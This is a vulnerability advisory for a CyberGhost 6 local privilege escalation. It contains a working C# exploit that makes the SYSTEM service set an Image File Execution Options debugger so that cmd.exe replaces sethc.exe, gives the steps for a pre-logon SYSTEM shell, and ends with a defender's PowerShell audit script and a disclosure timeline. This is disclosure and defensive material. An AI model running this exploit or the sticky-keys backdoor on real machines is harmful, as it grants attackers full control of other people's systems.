CG6Service
runs as a SYSTEM (LocalSystem) process, as the service configuration shows:
wmic service where name="CG6Service" get StartName
StartName
LocalSystem
Any local process can talk to this service over a named pipe.
The service exposes an interesting method, SetPeLauncherState,
which registers a debugger that is launched automatically for any process we choose, via the Debugger value under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
- see MSDN
Because the service writes this HKLM key as SYSTEM on behalf of an unprivileged caller, we can use the method for privilege escalation by registering cmd.exe
as the debugger for sethc.exe - the well-known technique called "sticky keys".
using System;
using CyberGhost.Communication;   // ships with CyberGhost 6, see the dependency list below

namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");

            // Ask the service to register cmd.exe as the IFEO "debugger" of sethc.exe.
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";

            // Connect to the service's named pipe and send the request;
            // the SYSTEM service writes the HKLM key on our behalf.
            EventSender CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);

            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}
Proof of Concept
The exploit needs these dependency DLLs copied next to it before launching:
copy "c:\Program Files\CyberGhost 6\CyberGhost.Communication.dll" .
copy "c:\Program Files\CyberGhost 6\CyberGhost.VPNServices.dll" .
copy "c:\Program Files\CyberGhost 6\MobileConcepts45.dll" .
After the exploit has run successfully, log out and press the Shift key
5 times on the logon screen.
cmd.exe is then executed as SYSTEM.
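As an added example (not part of the original advisory, and not CyberGhost code), the following PowerShell script performs the checks a defender or tester would want after reading the technique above and the PoC steps: it confirms the service account the same way the wmic line does, audits every Image File Execution Options subkey for a Debugger value, flags entries under binaries reachable from the logon screen (it generalizes beyond sethc.exe to the other accessibility binaries that offer the same pre-logon SYSTEM shell) and, with -Remove, deletes the value the PoC planted. The service name CG6Service and the registry path come from the advisory; the list of logon-reachable binaries, the "suspicious debugger" pattern and the -Remove switch are this example's own assumptions.

```powershell
# Added example (not from the original advisory): audit a host for the
# IFEO "Debugger" hijack the PoC sets, and optionally remove it.
# Run in an elevated PowerShell; reading the keys works unprivileged,
# deleting values under HKLM needs admin rights.
param(
    [switch]$Remove   # pass -Remove to delete suspicious Debugger values
)

$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Binaries reachable from the logon screen (and therefore started as SYSTEM
# before anyone logs on). sethc.exe is the one the PoC uses; the others are
# the usual alternatives for the same trick (assumed list, not from the advisory).
$logonBinaries = @('sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                   'magnify.exe', 'displayswitch.exe', 'atbroker.exe')

# 1. Confirm the service really runs as LocalSystem (CIM equivalent of the
#    wmic query in the advisory).
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='CG6Service'"
if ($svc) {
    "CG6Service: State=$($svc.State) StartName=$($svc.StartName) Path=$($svc.PathName)"
} else {
    'CG6Service is not installed on this host'
}

# 2. Walk every IFEO subkey and report any Debugger value. A legitimate entry
#    points at a real debugger (windbg, vsjitdebugger, ...); cmd.exe or a
#    script host under an accessibility binary is a backdoor.
$findings = foreach ($key in Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue) {
    $dbg = (Get-ItemProperty -Path $key.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if (-not $dbg) { continue }
    $image = $key.PSChildName.ToLower()
    [pscustomobject]@{
        Image      = $key.PSChildName
        Debugger   = $dbg
        LogonReach = $logonBinaries -contains $image
        Suspicious = ($logonBinaries -contains $image) -or
                     ($dbg -match '(?i)\\(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe')
    }
}

$findings | Format-Table -AutoSize

# 3. Optional cleanup: remove only the Debugger value and leave the rest of
#    the subkey alone, since other IFEO settings there may be legitimate.
if ($Remove) {
    foreach ($f in $findings | Where-Object Suspicious) {
        Remove-ItemProperty -Path (Join-Path $ifeo $f.Image) -Name Debugger
        "Removed Debugger value under $($f.Image)"
    }
}
```

Run it once after the PoC to see the sethc.exe entry pointing at cmd.exe flagged as Suspicious, then again with -Remove to verify the value is gone; the same audit is worth scheduling on hosts that run any SYSTEM service exposing a writable IFEO-style API, since the pipe is the only thing gating the write.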
Timeline
- 09-01-2017: Discovered
- 09-01-2017: Vendor notified
- 08-02-2017: New version released, issue resolved